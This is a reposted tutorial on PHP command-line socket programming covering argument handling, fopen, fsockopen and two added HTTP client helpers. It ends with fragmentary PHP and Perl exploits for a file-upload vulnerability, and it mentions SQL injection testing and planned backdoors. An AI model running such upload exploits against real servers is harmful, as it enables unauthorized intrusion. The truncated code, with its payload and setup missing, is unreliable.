PHP-Sockets Reading Notes

xiaoxiao2021-03-06  18

I have been learning PHP for two months and have gained a lot from it. Where I differ from most people is that what interests me most is PHP's socket support, and there are far too few articles about it. So I decided to write a series of PHP socket reading notes, starting from the most basic topics and working up to raw sockets (SOCK_RAW).

The series is driven by examples. Planned examples include port forwarding (getting through a firewall), network-based exploits, a port scanner, a PHP backdoor and a packet-sending exploit framework. Since this is a learning exercise I can only write one at a time, and all of them are written as PHP shell (command-line) programs.

Preface:

PHP is one of the most popular scripting languages in the world and has always been widely used in web programming. What I want to say is that PHP is not only good for the web; it is also excellent for shell scripting. It is just that people are more used to writing shell scripts in Perl. I am no PHP master; these are just a few weeks of reading notes, so please point out anything that is wrong. You can also mail me to discuss PHP.

Prerequisites:

What attracts me most about PHP is the Sockets extension. I could in fact simply use VB's Winsock and write an ordinary Winsock program entirely in VB, but I still chose PHP, because it is cross-platform.

By default PHP does not support advanced sockets; it only supports the "packaged" functions such as fsockopen. Sockets are a PHP extension, and you need to enable it. On Windows this is configured in php.ini: in the "Windows Extensions" section, remove the semicolon in front of `extension=php_sockets.dll`. That is all. On *nix, add the `--enable-sockets` option when compiling. If you are not using the dl() function, php_sockets.dll must be in the same directory as your PHP binary. That completes the PHP socket configuration.

Next, running the scripts.

Running a PHP script from the terminal is simple. On Windows: `C:\php\php.exe -q test.php`. On *nix, declare the interpreter at the top of the script, just as with Perl, for example `#!/usr/local/bin/php -q`, and then run `./test.php`. The -q parameter means that PHP does not output the HTTP header information.

Passing parameters:

Some people ask how to pass parameters to a PHP shell script. On the web you pass them in the URL: http://xx.com/aa.php?param1=xxxx&param2=ssssss. It makes no difference: PHP, like Perl, has similar command-line parameters. See the official description:

$argv

Array of arguments passed to the script. When the script is run in command-line mode, the $argv variable is passed the program's command-line arguments, C-style. When called via the GET method, the variable contains the query string data.

$argc

The number of command-line parameters passed to the program (when run in command-line mode).

Simply put, see my example:

```php
<?php
// Expect exactly three arguments after the script name (argc counts the script itself)
if ($argc != 4 || in_array($argv[1], array('--help', '-h', '?'))) {
    echo "by darkness[BST]. We will come back soon!\r\n";
    echo "------------------------------------------------\r\n";
    echo "c:\\php\\php.exe -q uploadexp.php http://www.bugkidz.org/upload.php filepath\r\n";
    echo "------------------------------------------------\r\n";
    exit(1);  // stop after printing the usage text
}

$host = $argv[1];
$url  = $argv[2];
$path = $argv[3];
?>
```

I think you will understand this: here $argv[0] refers to the program itself. You can also write:

```php
printf("%s", $argv[1]);
```

The preceding section covered command-line operation. For more, please refer to

http://www.php.net/manual/en/features.commandline.php

1. fopen

fopen can also be regarded as a packaged socket function: it is used not only for reading files but also for sockets. fopen is the equivalent of the Inet control/class in other languages, and for URL operations it is more high-level than fsockopen.

How to use fopen:

```php
$s = fopen($url, $mode);
```

fopen modes:

Mode   Description

'r'    Open for reading only; place the file pointer at the beginning of the file.

'r+'   Open for reading and writing; place the file pointer at the beginning of the file.

'w'    Open for writing only; place the file pointer at the beginning of the file and truncate the file to zero length. If the file does not exist, attempt to create it.

'w+'   Open for reading and writing; place the file pointer at the beginning of the file and truncate the file to zero length. If the file does not exist, attempt to create it.

'a'    Open for writing only; place the file pointer at the end of the file. If the file does not exist, attempt to create it.

'a+'   Open for reading and writing; place the file pointer at the end of the file. If the file does not exist, attempt to create it.

'x'    Create and open for writing only; place the file pointer at the beginning of the file. If the file already exists, the fopen() call fails by returning false and generating an E_WARNING level error. If the file does not exist, attempt to create it. This is equivalent to specifying O_EXCL|O_CREAT flags for the underlying open(2) system call. This option is supported in PHP 4.3.2 and later, and only works for local files.

'x+'   Create and open for reading and writing; place the file pointer at the beginning of the file. If the file already exists, the fopen() call fails by returning false and generating an E_WARNING level error. If the file does not exist, attempt to create it. This is equivalent to specifying O_EXCL|O_CREAT flags for the underlying open(2) system call. This option is supported in PHP 4.3.2 and later, and only works for local files.

That is, the same operations you use on local files can also be used over the Internet. Isn't that cool?

If you want to test whether a site's IIS directory is writable, you can write it this way:

```php
$s = fopen("http://www.bugkidz.org", "x+") or die("No write permission");
```

If that succeeds, you can continue to construct the following statements and write files remotely with fwrite. (Note that, as the mode list above says, the 'x' modes are only supported for local files.) But the typical website is read-only:

```php
$s = fopen("http://www.bugkidz.org/index.php?id=1", "r");
```

This reads the content of http://www.bugkidz.org/index.php?id=1, but the stream has to be read in a loop to get the complete content, like this:

```php
while (!feof($s)) {
    echo fgets($s, 1024);
}
```

I think fopen is the most convenient for SQL injection testing:

```php
function phpinet($url)
{
    // "or die" binds after the assignment, so $s receives the fopen() result
    $s = fopen($url, "r") or die("Open URL error");
    $cache = "";
    // Read line by line until end of stream, accumulating the whole response
    while (!feof($s)) {
        $cache .= fgets($s, 1024);
    }
    fclose($s);
    return $cache;
}
```

This function is equivalent to Inet.OpenURL in VB.
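The phpinet() function above stops the whole script with die() and gives the caller no way to tell a failed open from an empty page. The following is an added example, not code from the original article, that reads a URL through fopen() with an explicit timeout and returns the HTTP status line alongside the body. The function name read_url(), the example host www.example.com and the 10-second timeout are assumptions; it relies on allow_url_fopen being enabled in php.ini, which the http:// wrapper requires.

```php
<?php
// Added example (not from the original article): read a URL through fopen()
// with an explicit timeout and error handling instead of die().
// Assumptions: allow_url_fopen=On; only http/https URLs are accepted.

function read_url($url, $timeout = 10)
{
    // Refuse file://, ftp://, php:// and other wrappers: only fetch web URLs
    $scheme = parse_url($url, PHP_URL_SCHEME);
    if (!in_array($scheme, array('http', 'https'), true)) {
        return false;
    }

    // Stream context: network timeout, no automatic redirect following,
    // and hand back 4xx/5xx bodies instead of failing the open
    $ctx = stream_context_create(array(
        'http' => array(
            'method'          => 'GET',
            'timeout'         => $timeout,
            'follow_location' => 0,
            'ignore_errors'   => true,
        ),
    ));

    $s = @fopen($url, 'r', false, $ctx);
    if ($s === false) {
        return false;
    }

    $content = '';
    while (!feof($s)) {
        $chunk = fgets($s, 1024);
        if ($chunk === false) {
            break;  // read error or timeout
        }
        $content .= $chunk;
    }

    // The http wrapper populates $http_response_header in the scope of the
    // fopen() call; element 0 is the status line, e.g. "HTTP/1.1 200 OK"
    $status = isset($http_response_header[0]) ? $http_response_header[0] : '';
    fclose($s);

    return array('status' => $status, 'body' => $content);
}

// Usage from the command line
$result = read_url('http://www.example.com/');
if ($result === false) {
    fwrite(STDERR, "Open URL error\n");
    exit(1);
}
echo $result['status'], "\n";
echo strlen($result['body']), " bytes\n";
```

Because the status line is returned rather than swallowed, a caller can distinguish a 404 or 500 from a successful fetch, which matters when the same helper is reused across many requests. The scheme check keeps a URL taken from $argv from being turned into a read of a local file through the file:// wrapper.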

fsockopen is also one of the encapsulated socket functions. It is somewhat like the Winsock control in VB. Unfortunately it only supports active (outgoing) socket connections; it does not support bind, listen and so on. If you need those features, you must use PHP's advanced socket programming (the Sockets extension). Even so, fsockopen can meet most needs. Usage: `resource fsockopen(string $target, int $port [, int &$errno [, string &$errstr [, float $timeout]]])`

Example: `$sock = fsockopen("192.168.0.1", 80, $errno, $errstr, 30);`. The first two arguments are the address and port, the middle two are variables that receive the error number and message, and the last one sets the timeout. Usually it is written simply as `$sock = fsockopen("192.168.0.1", 80);`, which is a typical TCP connection. A UDP connection is `$sock = fsockopen("udp://192.168.0.1", 53);`; with this you could also write a TFTP client.

fsockopen application examples:

Example 1: a simple HTTP session.

Code:

```php
<?php
$fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)<br />\n";
} else {
    // Build a minimal HTTP/1.1 request; "Connection: Close" makes the server
    // close the socket when the response is complete
    $out  = "GET / HTTP/1.1\r\n";
    $out .= "Host: www.example.com\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    // Read the response until the server closes the connection
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
    fclose($fp);
}
?>
```

The process is generally: open an fsockopen resource, define the content to send, write it with the fwrite or fputs function, read the output line by line with fgets (or fread) until the end of the stream is reached, and finally close the fsockopen resource with fclose. Angel wrote a PHP port-scanning tool and posted it at http://www.4ngel.net/Article/20.htm
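The session above dumps the raw response with echo. The following is an added example, not code from the original article or from Angel's tool, that follows the same open / write / read / close process but applies a read timeout and parses the status line and headers into values a script can act on. The function name http_get(), the host www.example.com and the 10-second timeout are assumptions; it speaks plain TCP only (no TLS) and does not decode chunked transfer encoding.

```php
<?php
// Added example (not from the original article): HTTP client on top of
// fsockopen() with a read timeout and header parsing.
// Assumptions: plain TCP, no TLS, no chunked-encoding support.

function http_get($host, $port, $path, $timeout = 10)
{
    $sock = @fsockopen($host, $port, $errno, $errstr, $timeout);
    if ($sock === false) {
        return array('error' => "$errstr ($errno)");
    }
    // fsockopen()'s timeout only covers connect(); reads need their own
    stream_set_timeout($sock, $timeout);

    $req  = "GET $path HTTP/1.1\r\n";
    $req .= "Host: $host\r\n";
    $req .= "Connection: close\r\n\r\n";
    fwrite($sock, $req);

    // Status line, then headers up to the first empty line
    $status  = trim((string) fgets($sock, 1024));
    $headers = array();
    while (($line = fgets($sock, 1024)) !== false) {
        $line = trim($line);
        if ($line === '') {
            break;
        }
        $parts = explode(':', $line, 2);
        if (count($parts) === 2) {
            $headers[strtolower(trim($parts[0]))] = trim($parts[1]);
        }
    }

    // Body runs until the server closes the connection; abort on timeout
    $body = '';
    while (!feof($sock)) {
        $chunk = fread($sock, 8192);
        $meta  = stream_get_meta_data($sock);
        if ($meta['timed_out']) {
            fclose($sock);
            return array('error' => 'read timed out');
        }
        if ($chunk === false) {
            break;
        }
        $body .= $chunk;
    }
    fclose($sock);

    $code = 0;
    if (preg_match('#^HTTP/\d\.\d (\d{3})#', $status, $m)) {
        $code = (int) $m[1];
    }
    return array('code' => $code, 'headers' => $headers, 'body' => $body);
}

// Usage from the command line
$r = http_get('www.example.com', 80, '/');
if (isset($r['error'])) {
    fwrite(STDERR, $r['error'] . "\n");
    exit(1);
}
echo "status: ", $r['code'], "\n";
echo "server: ", isset($r['headers']['server']) ? $r['headers']['server'] : '(none)', "\n";
echo "body:   ", strlen($r['body']), " bytes\n";
```

The stream_set_timeout() call and the timed_out check are the part the manual example lacks: without them a server that accepts the connection but never answers leaves the script blocked in fgets() indefinitely. The same check matters even more with the udp:// form mentioned above, since UDP has no handshake and fsockopen() can return a resource even when nothing is listening on the remote port.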

Choosing fsockopen to write a simple exploit-sending framework is definitely a good idea, because it is so easy. Look at my exploit for a PHP upload vulnerability. Code:

```php
<?php
// The opening lines of this script, including the fsockopen() call that
// creates $sock and the beginning of the multipart $body, are missing from
// the source page; only the tail of the $body definition survives.
    . "----------------------------7D41F4A600472--\r\n"
    . "\r\n";

// Request headers for the multipart upload
$header = "POST /index.php?action=upload HTTP/1.1\r\n"
    . "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n"
    . "Referer: http://127.0.0.1/index.php?path=./\r\n"
    . "Accept-Language: zh-cn\r\n"
    . "Content-Type: multipart/form-data; boundary=----------------------------7D41F4A600472\r\n"
    . "Accept-Encoding: gzip, deflate\r\n"
    . "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n"
    . "Host: 127.0.0.1\r\n"
    // one header line is garbled beyond recovery in the source at this point
    . "Connection: Keep-Alive\r\n"
    . "Cache-Control: no-cache\r\n"
    . "Cookie: PHPSESSID=111111111111111111111111111111111111111111111111111111111\r\n";

fputs($sock, $header);   // send the headers
sleep(1);
fputs($sock, $body);     // then the multipart body
while (!feof($sock)) {   // print the server's response
    echo fgets($sock, 128);
}
fclose($sock);
?>
```

Let's look at the exploit that xiaolu wrote in Perl:

```perl
#!/usr/bin/perl
$| = 1;
use Socket;

$host = "127.0.0.1";
$port = "80";
$uploadto = "";   # the value of this variable is lost in the source page

# Multipart body: a "path" field and an "image" file field
$str = "----------------------------7D41F4A600472\r\n"
     . "Content-Disposition: form-data; name=\"path\"\r\n"
     . "\r\n"
     . "www.ppp\r\n"
     . "----------------------------7D41F4A600472\r\n"
     . "Content-Disposition: form-data; name=\"image\"; filename=\"f:\\tools\\1.gif\"\r\n"
     . "Content-Type: text/plain\r\n"
     . "\r\n"
     # the file contents that preceded these closing tags are missing from the source page
     . "?>\r\n"
     . "?>\r\n"
     . "----------------------------7D41F4A600472--\r\n"
     . "\r\n";
print $str;
$len = length($str);
print $len;

# Request headers followed by the body
$req = "POST /1/1/3721/index.php?action=upload HTTP/1.1\r\n"
     . "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n"
     . "Referer: http://127.0.0.1/index.php?path=./\r\n"
     . "Accept-Language: en-cn\r\n"
     . "Content-Type: multipart/form-data; boundary=----------------------------7D41F4A600472\r\n"
     . "Accept-Encoding: gzip, deflate\r\n"
     . "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n"
     . "Host: 127.0.0.1\r\n"
     . "Cache-Control: no-cache\r\n"
     . "Cookie: PHPSESSID=111111111111111111111111111111111111111111111111111\r\n"
     . "$str\r\n\r\n";
print $req;
@res = sendraw($req);
print @res;

# hmm... maybe you can send it by other ways
sub sendraw {
    my ($pstr) = @_;   # only the "@_" of this line survives in the source page
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    # the remainder of this subroutine is missing from the source page
}
```

Please cite the original source when reposting: https://www.9cbs.com/read-41651.html
